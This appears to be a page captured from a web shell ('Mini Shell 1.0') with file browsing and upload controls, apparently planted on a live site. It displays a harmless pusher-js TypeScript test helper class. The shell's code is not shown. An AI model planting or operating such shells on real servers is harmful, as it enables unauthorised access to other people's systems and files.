HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/cwd/node_modules/pusher-js/spec/javascripts/helpers/
Upload File :
Current File : //proc/self/cwd/node_modules/pusher-js/spec/javascripts/helpers/pusher_integration_class.ts
import Pusher from '../../../src/core/pusher';
import {ScriptReceiverFactory} from '../../../src/runtimes/web/dom/script_receiver_factory';

export default class PusherIntegration extends Pusher {

  static Integration : any = {
    ScriptReceivers: new ScriptReceiverFactory(
      "_pusher_integration_script_receivers",
      "Pusher.Integration.ScriptReceivers"
    )}

}